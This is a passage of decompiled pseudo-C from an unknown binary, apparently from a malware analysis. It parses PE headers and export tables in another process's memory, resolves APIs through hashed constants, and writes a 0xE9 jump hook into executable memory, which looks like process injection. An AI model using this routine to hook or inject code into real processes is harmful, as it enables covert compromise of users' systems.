				E008B9350( &_v176);
				_push(0);
				E008B9350( &_v76);
				_v536 = 0x58d59bc9;
				asm("pxor xmm0, xmm0");
				asm("movq [esp+0x68], xmm0");
				E008B9670( &_v80, E008B9650( &_v80) + 0x10);
				E008B9640( &_v84, E008B9650( &_v84) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v544 = 0x3b4caff7;
				asm("movq [esp+0x68], xmm1");
				E008B9670( &_v88, E008B9650( &_v88) + 0x10);
				E008B9640( &_v92, E008B9650( &_v92) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v552 = 0xd9ff67e3;
				asm("movq [esp+0x68], xmm1");
				E008B9670( &_v96, E008B9650( &_v96) + 0x10);
				E008B9640( &_v100, E008B9650( &_v100) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v560 = 0xbcd9ca71;
				asm("movq [esp+0x68], xmm1");
				E008B9670( &_v104, E008B9650( &_v104) + 0x10);
				E008B9640( &_v108, E008B9650( &_v108) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v568 = 0x1be15feb;
				asm("movq [esp+0x68], xmm1");
				E008B9670( &_v112, E008B9650( &_v112) + 0x10);
				E008B9640( &_v116, E008B9650( &_v116) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v576 = 0xebe915fa;
				asm("movq [esp+0x68], xmm1");
				E008B9670( &_v120, E008B9650( &_v120) + 0x10);
				E008B9640( &_v124, E008B9650( &_v124) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("movups [eax], xmm0");
				E008C1270(0x588ab3ea,  &_v128);
				E008B9640( &_v128, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1d8], xmm0");
				E008B9640( &_v132, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1e0], xmm0");
				E008B9640( &_v136, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1f0], xmm0");
				E008B9640( &_v140, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1f8], xmm0");
				E008B9640( &_v144, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x200], xmm0");
				E008B9640( &_v148, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [eax-0x38], xmm0");
				 *((intOrPtr*)( &_v128 - 0x98)) = _t1534;
				E0089D570( &_v280,  &_v136,  &_v128);
				_t1487 = _v140;
				_t1027 = _v136;
				if((_t1487 | _v136) != 0) {
					_push(0x40);
					E008B9350( &_v288);
					E008C0FA0(_t1534, E008B9640( &_v292, 0), __eflags, _t1487, _t1027, 0x40, 0);
					_t1435 = E008B9640( &_v312, 0);
					__eflags = ( *_t1435 & 0x0000ffff) - 0x5a4d;
					if(( *_t1435 & 0x0000ffff) == 0x5a4d) {
						asm("cdq");
						_v560 = _t1435[0x1e] + _t1487;
						asm("adc edx, ebx");
						_v564 = _t1435;
						_push(0x108);
						E008B9350( &_v388);
						E008C0FA0(_t1534, E008B9640( &_v392, 0), __eflags, _v568, _v572, 0x108, 0);
						_push( &_v412);
						E008B9520( &_v316);
						E008B9510( &_v416);
						_t632 = E008B9640( &_v320, 0);
						__eflags =  *_t632 - 0x4550;
						if( *_t632 != 0x4550) {
							goto L3;
						} else {
							_t1481 =  *(_t632 + 0x88);
							_v568 = _t1481;
							_v572 =  *((intOrPtr*)(_t632 + 0x8c));
							__eflags = _t1481;
							if(_t1481 == 0) {
								goto L3;
							} else {
								__eflags = _v572;
								if(_v572 == 0) {
									goto L3;
								} else {
									_push(_v572);
									E008B9350( &_v396);
									_t1011 = E008B9640( &_v400, 0);
									asm("adc ebx, 0x0");
									E008C0FA0(_t1534, _t1011, __eflags, _t1487 + _v576, _t1027, _v580, 0);
									_push( &_v420);
									E008B9520( &_v324);
									E008B9510( &_v424);
									_t1065 = E008B9640( &_v328, 0);
									_t1017 =  *((intOrPtr*)(_t1572 + 0x44));
									 *((intOrPtr*)(_t1065 + 0x1c)) =  *((intOrPtr*)(_t1065 + 0x1c)) - _t1017;
									 *((intOrPtr*)(_t1065 + 0x24)) =  *((intOrPtr*)(_t1065 + 0x24)) - _t1017;
									 *((intOrPtr*)(_t1065 + 0x20)) =  *((intOrPtr*)(_t1065 + 0x20)) - _t1017;
									_t1485 = E008B9640( &_v332,  *((intOrPtr*)(_t1065 + 0x20)) - _t1017);
									__eflags =  *(_t1065 + 0x18);
									if( *(_t1065 + 0x18) > 0) {
										_v560 = _t1534;
										_t1021 = 0;
										__eflags = 0;
										_t1531 = _v576;
										while(1) {
											_t1021 = _t1021 + 1;
											 *((intOrPtr*)(_t1485 + _t1021 * 8 - 8)) =  *((intOrPtr*)(_t1485 + _t1021 * 8 - 8)) - _t1531;
											_t554 = _t1021 - 1; // 0x0
											_t1567 = _t1021 + _t1021;
											__eflags = _t1021 + _t554 -  *(_t1065 + 0x18);
											if(_t1021 + _t554 >=  *(_t1065 + 0x18)) {
												break;
											}
											 *((intOrPtr*)(_t1485 + _t1021 * 8 - 4)) =  *((intOrPtr*)(_t1485 + _t1021 * 8 - 4)) - _t1531;
											__eflags = _t1567 -  *(_t1065 + 0x18);
											if(_t1567 <  *(_t1065 + 0x18)) {
												continue;
											}
											break;
										}
										_t1534 = _v560;
									}
									_push( &_v308);
									E008B93D0( &_v292);
								}
							}
						}
					} else {
						L3:
						_push(0);
						E008B9350( &_v284);
					}
					E008B9510( &_v304);
					E008BA110( &_v88);
					_v544 = 0x41195991;
					asm("pxor xmm0, xmm0");
					asm("movq [esp+0x68], xmm0");
					E008B9670( &_v88, E008B9650( &_v88) + 0x10);
					E008B9640( &_v92, E008B9650( &_v92) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					_v552 = 0x77be1f6;
					asm("movq [esp+0x68], xmm1");
					E008B9670( &_v96, E008B9650( &_v96) + 0x10);
					E008B9640( &_v100, E008B9650( &_v100) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					_v560 = 0xb5cdecc0;
					asm("movq [esp+0x68], xmm1");
					E008B9670( &_v104, E008B9650( &_v104) + 0x10);
					E008B9640( &_v108, E008B9650( &_v108) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					_t1573 = _t1572 + 0xfffffff4;
					asm("movups [eax], xmm0");
					asm("movq xmm1, [edx+0xd8]");
					asm("movq [esp], xmm1");
					_v668 =  &_v112;
					E0089E780( &_v312, _t1534, __eflags);
					E008B9640( &_v124, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x1e8], xmm0");
					E008B9640( &_v128, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x210], xmm0");
					_t1438 = E008B9640( &_v132, 0x20);
					_v268 =  *((intOrPtr*)(_t1438 + 8));
					 *((intOrPtr*)(_t1573 + 0x218)) =  *((intOrPtr*)(_t1438 + 0xc));
					_push(0);
					E008B9350( &_v320);
					_push(0);
					E008B9350( &_v308);
					_push(0);
					_push( *0x8c9d74);
					E008A1BA0(__eflags,  &_v284);
					E008B9B10( &_v340);
					E008B0B10( &_v284);
					E008B9670( &_v328, E008B9A90( &_v344, _t1534));
					_t667 = E008B9640( &_v348, 0);
					E0089AC20(_t1569, _t667, E008B9640( &_v336, 0), _v296);
					_t1574 = _t1573 + 8;
					_t1030 = E008B9650( &_v340);
					_t95 = _t1030 + 2; // 0x2
					_v180 = E0089D860( &_v300, 0x20000000, __eflags, _t95);
					_v640 = 0x20000000;
					_t672 = E0089DB60( &_v304, 0x80000000, __eflags, 0x82);
					_v192 = _t672;
					 *(_t1574 + 0x220) = 0x80000000;
					__eflags = _t672 |  *(_t1574 + 0x220);
					if((_t672 |  *(_t1574 + 0x220)) == 0) {
						L6:
						E008B9510( &_v288);
						E008B9510( &_v304);
						E008B9510( &_v320);
						E008B9510( &_v120);
						E0089E2F0(_t1030, _t1574 + 0x1bc, _t1569);
						E008B9510(_t1574 + 0x1ac);
						__eflags = 0;
						return 0;
					} else {
						__eflags = _v124 | _v584;
						if((_v124 | _v584) != 0) {
							E008A0B70( &_v560, 0, 0x80);
							_t1576 = _t1574 + 0xc;
							_v464 = _a4;
							_push(0);
							_push(0);
							E008C2060(_t1030,  &_v400, 0, _t1534);
							_v348 =  *((intOrPtr*)(_t1576 + 0x48));
							_t1449 =  &_v408;
							 *((intOrPtr*)(_t1449 + 0x38)) = _a8;
							_push(_t1449);
							E0089E090( &_v384, _t1534,  &_v352);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [esp+0xb0], xmm1");
							_v508 = E008B9650(_a8);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [esp+0xc0], xmm1");
							_v492 = E008B9650(_v620);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [edi-0xb8], xmm1");
							E008C0FA0(_t1534,  &_v460, __eflags, _v272, _v156, 7,  &_v292);
							_t1154 =  &_v156;
							 *((intOrPtr*)(_t1154 - 0x148)) = _v288;
							 *((intOrPtr*)(_t1154 - 0x144)) =  *((intOrPtr*)(_t1154 - 0x10));
							E008BA110(_t1154);
							_v612 = 0x9cac62c7;
							asm("pxor xmm0, xmm0");
							asm("movq [esp+0x68], xmm0");
							E008B9670( &_v156, E008B9650( &_v156) + 0x10);
							E008B9640( &_v160, E008B9650( &_v160) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v620 = 0xa8f2638d;
							asm("movq [esp+0x68], xmm1");
							E008B9670( &_v164, E008B9650( &_v164) + 0x10);
							E008B9640( &_v168, E008B9650( &_v168) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v628 = 0xd8cc7390;
							asm("movq [esp+0x68], xmm1");
							E008B9670( &_v172, E008B9650( &_v172) + 0x10);
							E008B9640( &_v176, E008B9650( &_v176) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v636 = 0x6a68465a;
							asm("movq [esp+0x68], xmm1");
							E008B9670( &_v180, E008B9650( &_v180) + 0x10);
							E008B9640(_t1576 + 0x22c, E008B9650(_t1576 + 0x228) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v644 = 0x58d59bc9;
							asm("movq [esp+0x68], xmm1");
							E008B9670(_t1576 + 0x22c, E008B9650(_t1576 + 0x228) + 0x10);
							E008B9640( &_v192, E008B9650( &_v192) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							 *((intOrPtr*)(_t1576 + 0x60)) = 0xe9fbf3a8;
							asm("movq [esp+0x68], xmm1");
							E008B9670( &_v196, E008B9650( &_v196) + 0x10);
							E008B9640( &_v200, E008B9650( &_v200) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v660 = 0x649746ec;
							asm("movq [esp+0x68], xmm1");
							E008B9670(_t1576 + 0x22c, E008B9650(_t1576 + 0x228) + 0x10);
							E008B9640(_t1576 + 0x22c, E008B9650(_t1576 + 0x228) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v668 = 0x35b39b2b;
							asm("movq [esp+0x68], xmm1");
							E008B9670(_t1576 + 0x22c, E008B9650(_t1576 + 0x228) + 0x10);
							E008B9640( &_v216, E008B9650( &_v216) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							_t1452 =  &_v220;
							asm("movups [eax], xmm0");
							E008C1270(0x588ab3ea, _t1452);
							E008B9640( &_v220, 0);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x70], xmm0");
							E008B9640(_t1576 + 0x22c, 0x10);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x78], xmm0");
							E008B9640(_t1576 + 0x22c, 0x20);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x80], xmm0");
							E008B9640( &_v232, 0x30);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x88], xmm0");
							E008B9640(_t1576 + 0x22c, 0x40);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x90], xmm0");
							E008B9640(_t1576 + 0x22c, 0x50);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x98], xmm0");
							E008B9640(_t1576 + 0x22c, 0x60);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0xa0], xmm0");
							E008B9640( &_v248, 0x70);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [ecx-0x100], xmm0");
							_t747 = E0089D530( &_v380, _t1452);
							_v396 = _t747;
							_v400 = _t1452;
							_t1496 = _t1452 - 0xffffffff;
							__eflags = _t747 - 0xffffffff | _t1452 - 0xffffffff;
							if((_t747 - 0xffffffff | _t1452 - 0xffffffff) == 0) {
								E0089E230( &_v388);
								E008C2530(_t1030,  &_v412, 0xffffffff, _t1496, _t1534);
								E008B9510( &_v300);
								E008B9510( &_v316);
								E008B9510( &_v332);
								E008B9510( &_v132);
								E0089E2F0(_t1030, _t1576 + 0x1bc, _t1569);
								E008B9510( &_v256);
								__eflags = 0;
								return 0;
							} else {
								_t1455 = _v108 | _v104;
								__eflags = _t1455;
								if(_t1455 == 0) {
									_v604 = _t1030;
									_t1498 = 0;
									__eflags = 0;
									 *((intOrPtr*)(_t1576 + 0x54)) = _t1534;
									do {
										_push(0);
										E008B9350( &_v428);
										E008A16B0(_t1498, _t1534,  &_v376, 0x57325ee3);
										E008AFDB0( &_v384,  &_v376);
										_t1456 = 0x7fffffff;
										E008B9710( &_v444, _v380, E008B6040(_v380, 0x7fffffff));
										E008B0B10( &_v388);
										E008A8CA0( &_v396);
										_t1537 = _v168;
										_t1034 =  *((intOrPtr*)( &_v452 + 0x120));
										_t768 = E008B9650( &_v452);
										__eflags = _t768;
										if(_t768 <= 0) {
											L25:
											asm("movq xmm0, [esp+0x200]");
											asm("movq [esp], xmm0");
											asm("pxor xmm2, xmm2");
											_v680 = 5;
											_v676 = _v280;
											asm("movq xmm1, [esp+0x210]");
											 *(_t1576 + 0x10) = _v284;
											asm("movq [esp+0x14], xmm1");
											_t1034 = _v148;
											_v660 = _v148;
											_t1534 = _v144;
											_v656 = _v144;
											asm("movq [esp+0x24], xmm2");
											asm("movq [esp+0x2c], xmm2");
											_t770 = E008C04B0(_t1498, _v144);
											__eflags = _t770;
											if(_t770 == 0) {
												E008A22A0(0x3e8, _t1456);
												E008B9510( &_v432);
												_t1455 =  &_v120;
												E0089D570( &_v264, _t1455,  &_v112);
												__eflags = _v116 | _v112;
												if((_v116 | _v112) != 0) {
													_t1030 =  *((intOrPtr*)(_t1576 + 0x50));
													_t1534 = _v604;
													goto L9;
												} else {
													_t974 = E0089D530( &_v264, _t1455);
													_v280 = _t974;
													_v284 = _t1455;
													_t1479 = _t1455 - 0xffffffff;
													__eflags = _t974 - 0xffffffff | _t1455 - 0xffffffff;
													if((_t974 - 0xffffffff | _t1455 - 0xffffffff) == 0) {
														E0089E230( &_v392);
														E008C2530(_t1034,  &_v416, _t1479, _t1498, _t1534);
														E008B9510( &_v304);
														E008B9510( &_v320);
														E008B9510( &_v336);
														E008B9510( &_v136);
														E0089E2F0(_t1034, _t1576 + 0x1bc, _t1569);
														E008B9510( &_v260);
														__eflags = 0;
														return 0;
													} else {
														goto L29;
													}
												}
											} else {
												goto L26;
											}
										} else {
											__eflags = 0;
											_v624 = _t1498;
											_t1498 = _t1537;
											_t1534 = 0;
											while(1) {
												_t1005 = E008B9640( &_v432, _t1534);
												asm("movq xmm0, [esp+0x200]");
												asm("movq [esp], xmm0");
												 *((intOrPtr*)(_t1576 + 8)) = 5;
												_v680 = _v284;
												asm("movq xmm1, [esp+0x1f8]");
												_v676 = _v288;
												_t1456 =  *_t1005 & 0x000000ff;
												asm("movq [esp+0x14], xmm1");
												asm("movq xmm2, [0x8c9d40]");
												 *((intOrPtr*)(_t1576 + 0x1c)) = _t1498;
												_v660 = _t1034;
												_v656 =  *_t1005 & 0x000000ff;
												 *((intOrPtr*)(_t1576 + 0x28)) = 0;
												asm("movq [esp+0x2c], xmm2");
												_t1006 = E008C04B0(_t1498, _t1534);
												__eflags = _t1006;
												if(_t1006 != 0) {
													break;
												}
												E008A22A0(0x64, _t1456);
												_t1498 = _t1498 + 1;
												asm("adc ebx, 0x0");
												_t1534 = _t1534 + 1;
												_t1008 = E008B9650( &_v432);
												__eflags = _t1534 - _t1008;
												if(_t1534 < _t1008) {
													continue;
												} else {
													_t1498 = _v624;
													goto L25;
												}
												goto L95;
											}
											L26:
											E008B9510( &_v432);
											E0089E230( &_v392);
											E008C2530(_t1034,  &_v416, _t1456, _t1498, _t1534);
											E008B9510( &_v304);
											E008B9510( &_v320);
											E008B9510( &_v336);
											E008B9510( &_v136);
											E0089E2F0(_t1034, _t1576 + 0x1bc, _t1569);
											E008B9510( &_v260);
											__eflags = 0;
											return 0;
										}
										goto L95;
										L29:
										_t1498 = _t1498 + 1;
										__eflags = _t1498 - 0xa;
									} while (_t1498 != 0xa);
									E0089E230( &_v392);
									E008C2530(_t1034,  &_v416, _t1479, _t1498, _t1534);
									E008B9510( &_v304);
									E008B9510( &_v320);
									E008B9510( &_v336);
									E008B9510( &_v136);
									E0089E2F0(_t1034, _t1576 + 0x1bc, _t1569);
									E008B9510( &_v260);
									__eflags = 0;
									return 0;
								} else {
									L9:
									 *((intOrPtr*)(_t1576 + 0x50)) = _t1030;
									_t1499 = 0;
									__eflags = 0;
									_v604 = _t1534;
									_t1538 = _v284;
									_t1035 = _v280;
									while(1) {
										asm("movq xmm0, [esp+0x200]");
										asm("movq xmm1, [esp+0x1f8]");
										asm("pxor xmm2, xmm2");
										asm("movq [esp], xmm0");
										_v680 = 5;
										_v676 = _t1035;
										 *(_t1576 + 0x10) = _t1538;
										asm("movq [esp+0x14], xmm1");
										_v660 = _v148;
										asm("movq xmm3, [0x8c9d48]");
										_v656 = _v144;
										asm("movq [esp+0x24], xmm2");
										asm("movq [esp+0x2c], xmm3");
										_t778 = E008C04B0(_t1499, _t1538);
										__eflags = _t778;
										if(_t778 == 0) {
											break;
										}
										_t1035 = E0089D530( &_v264, _t1455);
										_t1538 = _t1455;
										_t1455 = _t1538 - 0xffffffff;
										__eflags = _t1035 - 0xffffffff | _t1455;
										if((_t1035 - 0xffffffff | _t1455) == 0) {
											E0089E230( &_v392);
											E008C2530(_t1035,  &_v416, _t1455, _t1499, _t1538);
											E008B9510( &_v304);
											E008B9510( &_v320);
											E008B9510( &_v336);
											E008B9510( &_v136);
											E0089E2F0(_t1035, _t1576 + 0x1bc, _t1569);
											E008B9510( &_v260);
											__eflags = 0;
											return 0;
										} else {
											_t1499 = _t1499 + 1;
											__eflags = _t1499 - 0xa;
											if(_t1499 != 0xa) {
												continue;
											} else {
												E0089E230( &_v392);
												E008C2530(_t1035,  &_v416, _t1455, _t1499, _t1538);
												E008B9510( &_v304);
												E008B9510( &_v320);
												E008B9510( &_v336);
												E008B9510( &_v136);
												E0089E2F0(_t1035, _t1576 + 0x1bc, _t1569);
												E008B9510( &_v260);
												__eflags = 0;
												return 0;
											}
										}
										goto L95;
									}
									_v284 = _t1538;
									_t1500 = 0;
									__eflags = 0;
									_v280 = _t1035;
									_t1539 = _v284;
									_t1036 = _v280;
									while(1) {
										_push(0x80);
										_push(_v144);
										_push(_v148);
										_push(_t1539);
										_push(_t1036);
										_t1457 =  &_v576;
										__eflags = E0089D170( &_v264, _t1457);
										if(__eflags != 0) {
											break;
										}
										_t1036 = E0089D530( &_v284, _t1457);
										_t1539 = _t1457;
										_t1477 = _t1539 - 0xffffffff;
										__eflags = _t1036 - 0xffffffff | _t1539 - 0xffffffff;
										if((_t1036 - 0xffffffff | _t1539 - 0xffffffff) == 0) {
											E0089E230( &_v412);
											E008C2530(_t1036,  &_v436, _t1477, _t1500, _t1539);
											E008B9510( &_v324);
											E008B9510( &_v340);
											E008B9510( &_v356);
											E008B9510( &_v156);
											E0089E2F0(_t1036,  &_v264, _t1569);
											E008B9510( &_v280);
											__eflags = 0;
											return 0;
										} else {
											_t1500 = _t1500 + 1;
											__eflags = _t1500 - 0xa;
											if(_t1500 != 0xa) {
												continue;
											} else {
												E0089E230( &_v412);
												E008C2530(_t1036,  &_v436, _t1477, _t1500, _t1539);
												E008B9510( &_v324);
												E008B9510( &_v340);
												E008B9510( &_v356);
												E008B9510( &_v156);
												E0089E2F0(_t1036,  &_v264, _t1569);
												E008B9510( &_v280);
												__eflags = 0;
												return 0;
											}
										}
										goto L95;
									}
									_v300 = _t1036;
									 *((intOrPtr*)(_t1576 + 0x64)) = _v620;
									asm("cdq");
									asm("movd xmm1, ebx");
									_t1038 =  &_v616;
									_t1501 =  *((intOrPtr*)(_t1038 + 0x1c8));
									_t781 =  &_v604;
									 *(_t781 + 0x12c) = _t1539;
									asm("movd xmm0, edx");
									asm("punpckldq xmm1, xmm0");
									_t1540 =  *((intOrPtr*)(_t781 - 0x14));
									 *((intOrPtr*)(_t781 - 0xc)) = 0;
									 *((intOrPtr*)(_t781 - 8)) =  *((intOrPtr*)(_t1038 + 0x1c8));
									asm("movdqu [eax-0x28], xmm1");
									asm("movq [eax], xmm1");
									_t1459 =  &_v612;
									_t782 = E008C0C90(_t1540, _t1459, __eflags, _t781, 0x40, _t1038);
									__eflags = _t782;
									if(_t782 != 0) {
										E0089E230( &_v412);
										E008C2530(_t1038,  &_v436, _t1459, _t1501, _t1540);
										E008B9510( &_v324);
										E008B9510( &_v340);
										E008B9510( &_v356);
										E008B9510( &_v156);
										E0089E2F0(_t1038,  &_v264, _t1569);
										E008B9510( &_v280);
										__eflags = 0;
										return 0;
									} else {
										__eflags = 0;
										_v624 = _t1540;
										_v628 = 0;
										_t1040 = _v300;
										_t1503 = _v620;
										_t1542 = _v160;
										while(1) {
											L35:
											asm("movq xmm0, [esp+0x200]");
											asm("movq [esp], xmm0");
											asm("pxor xmm2, xmm2");
											_v700 = 5;
											 *(_t1576 + 0xc) = _t1040;
											asm("movq xmm1, [esp+0x1f8]");
											 *(_t1576 + 0x10) = _v304;
											asm("movq [esp+0x14], xmm1");
											_v680 = _t1542;
											_v676 = _t1503;
											asm("movq [esp+0x24], xmm2");
											asm("movdqu xmm3, [esp+0x40]");
											asm("movq [esp+0x2c], xmm3");
											_t793 = E008C04B0(_t1503, _t1542);
											__eflags = _t793;
											if(_t793 == 0) {
												break;
											}
											_t1055 = 0;
											__eflags = 0;
											while(1) {
												_t911 = E0089CA10( &_v284, __eflags);
												_t1326 = _t1459;
												_t1459 = _t911 | _t1326;
												__eflags = _t1459;
												if(_t1459 != 0) {
													break;
												}
												__eflags = _t1055 - 0x20;
												if(_t1055 == 0x20) {
													_t1040 = 0xffffffff;
													_v304 = 0xffffffff;
												} else {
													E008A22A0(0x5dc, _t1459);
													_t1055 = _t1055 + 1;
													continue;
												}
												L47:
												__eflags = _t1040 - 0xffffffff | _v304 - 0xffffffff;
												if((_t1040 - 0xffffffff | _v304 - 0xffffffff) == 0) {
													E0089E230( &_v412);
													E008C2530(_t1040,  &_v436, 0xffffffff, _t1503, _t1542);
													E008B9510( &_v324);
													E008B9510( &_v340);
													E008B9510( &_v356);
													E008B9510( &_v156);
													E0089E2F0(_t1040,  &_v264, _t1569);
													E008B9510( &_v280);
													__eflags = 0;
													return 0;
												} else {
													_t1459 = _v628 + 1;
													_v628 = _t1459;
													__eflags = _t1459 - 0xa;
													if(_t1459 != 0xa) {
														goto L35;
													} else {
														E0089E230( &_v412);
														E008C2530(_t1040,  &_v436, _t1459, _t1503, _t1542);
														E008B9510( &_v324);
														E008B9510( &_v340);
														E008B9510( &_v356);
														E008B9510( &_v156);
														E0089E2F0(_t1040,  &_v264, _t1569);
														E008B9510( &_v280);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_v304 = _t1326;
											_t1040 = _t911;
											goto L47;
										}
										_v300 = _t1040;
										__eflags = 0;
										_t1041 = _v304;
										_t1543 = _v300;
										_v644 = 0;
										while(1) {
											_t795 = E008B9640( &_v324, 0);
											_t1504 = _t795;
											_push(E008B9650( &_v328));
											_push(_v624);
											_push(_v164);
											_push(_t1041);
											_push(_t1543);
											_t1460 = _t795;
											__eflags = E0089D170( &_v288, _t1460);
											if(__eflags != 0) {
												break;
											}
											_t1518 = 0;
											__eflags = 0;
											while(1) {
												_t1543 = E0089CA10( &_v304, __eflags);
												_t1041 = _t1460;
												__eflags = _t1543 | _t1041;
												if((_t1543 | _t1041) != 0) {
													break;
												}
												__eflags = _t1518 - 0x20;
												if(_t1518 == 0x20) {
													_t1543 = 0xffffffff;
													_t1041 = 0xffffffff;
												} else {
													E008A22A0(0x5dc, _t1460);
													_t1518 = _t1518 + 1;
													continue;
												}
												break;
											}
											_t1472 = _t1041 - 0xffffffff;
											__eflags = _t1543 - 0xffffffff | _t1041 - 0xffffffff;
											if((_t1543 - 0xffffffff | _t1041 - 0xffffffff) == 0) {
												E0089E230( &_v432);
												E008C2530(_t1041, _t1576 + 0x110, _t1472, _t1518, _t1543);
												E008B9510( &_v344);
												E008B9510(_t1576 + 0x170);
												E008B9510( &_v376);
												E008B9510( &_v176);
												E0089E2F0(_t1041,  &_v284, _t1569);
												E008B9510( &_v300);
												__eflags = 0;
												return 0;
											} else {
												_t900 =  *((intOrPtr*)(_t1576 + 0x40)) + 1;
												 *((intOrPtr*)(_t1576 + 0x40)) = _t900;
												__eflags = _t900 - 0xa;
												if(_t900 != 0xa) {
													continue;
												} else {
													E0089E230( &_v432);
													E008C2530(_t1041, _t1576 + 0x110, _t1472, _t1518, _t1543);
													E008B9510( &_v344);
													E008B9510(_t1576 + 0x170);
													E008B9510( &_v376);
													E008B9510( &_v176);
													E0089E2F0(_t1041,  &_v284, _t1569);
													E008B9510( &_v300);
													__eflags = 0;
													return 0;
												}
											}
											goto L95;
										}
										_v320 = _t1543;
										_t798 =  &_v636;
										 *(_t798 + 0x138) = _t1041;
										_t1544 =  *((intOrPtr*)(_t798 - 8));
										_t1461 = _t1576 + 0x6c;
										_t799 = E008C0C90( *((intOrPtr*)(_t798 - 8)), _t1576 + 0x6c, __eflags,  &_v624, _v636, _t798);
										__eflags = _t799;
										if(_t799 == 0) {
											_push(0);
											E008B9350(_t1576 + 0x44);
											_v644 = 0xe9;
											E008B9710( &_v668,  &_v644, 1);
											_v660 = _v192 -  *((intOrPtr*)( &_v660 + 0x154)) + 0xfffffffb;
											E008B9710( &_v676,  &_v660, 4);
											_t1043 =  &_v656;
											asm("movq xmm0, [0x8c9d50]");
											 *((intOrPtr*)(_t1043 + 4)) = _v328;
											 *((intOrPtr*)(_t1043 + 8)) =  *((intOrPtr*)(_t1043 + 0x1bc));
											asm("movq [ebx+0xc], xmm0");
											E008C0C90(_t1544, _t1576 + 0x6c, __eflags,  &_v644, 0x40, _t1043);
											__eflags = 0;
											_v676 = 0;
											_t1044 = _v356;
											_t1545 = _v352;
											while(1) {
												_t810 = E008B9640( &_v668, 0);
												_push(E008B9650(_t1576 + 0x40));
												_push(_v200);
												_push(_v316);
												_push(_t1044);
												_push(_t1545);
												_t1465 = _t810;
												_t812 = E0089D170( &_v312, _t1465);
												__eflags = _t812;
												if(_t812 != 0) {
													break;
												}
												_t1514 = 0;
												__eflags = 0;
												while(1) {
													_t1545 = E0089CA10( &_v328, __eflags);
													_t1044 = _t1465;
													__eflags = _t1545 | _t1044;
													if((_t1545 | _t1044) != 0) {
														break;
													}
													__eflags = _t1514 - 0x20;
													if(_t1514 == 0x20) {
														_t1545 = 0xffffffff;
														_t1044 = 0xffffffff;
													} else {
														E008A22A0(0x5dc, _t1465);
														_t1514 = _t1514 + 1;
														continue;
													}
													break;
												}
												_t1470 = _t1044 - 0xffffffff;
												__eflags = _t1545 - 0xffffffff | _t1044 - 0xffffffff;
												if((_t1545 - 0xffffffff | _t1044 - 0xffffffff) == 0) {
													E008B9510(_t1576 + 0x40);
													E0089E230(_t1576 + 0x128);
													E008C2530(_t1044,  &_v480, _t1470, _t1514, _t1545);
													E008B9510( &_v368);
													E008B9510( &_v384);
													E008B9510( &_v400);
													E008B9510( &_v200);
													E0089E2F0(_t1044,  &_v308, _t1569);
													E008B9510( &_v324);
													__eflags = 0;
													return 0;
												} else {
													_t865 = _v668 + 1;
													_v668 = _t865;
													__eflags = _t865 - 0xa;
													if(_t865 != 0xa) {
														continue;
													} else {
														E008B9510(_t1576 + 0x40);
														E0089E230(_t1576 + 0x128);
														E008C2530(_t1044,  &_v480, _t1470, _t1514, _t1545);
														E008B9510( &_v368);
														E008B9510( &_v384);
														E008B9510( &_v400);
														E008B9510( &_v200);
														E0089E2F0(_t1044,  &_v308, _t1569);
														E008B9510( &_v324);
														__eflags = 0;
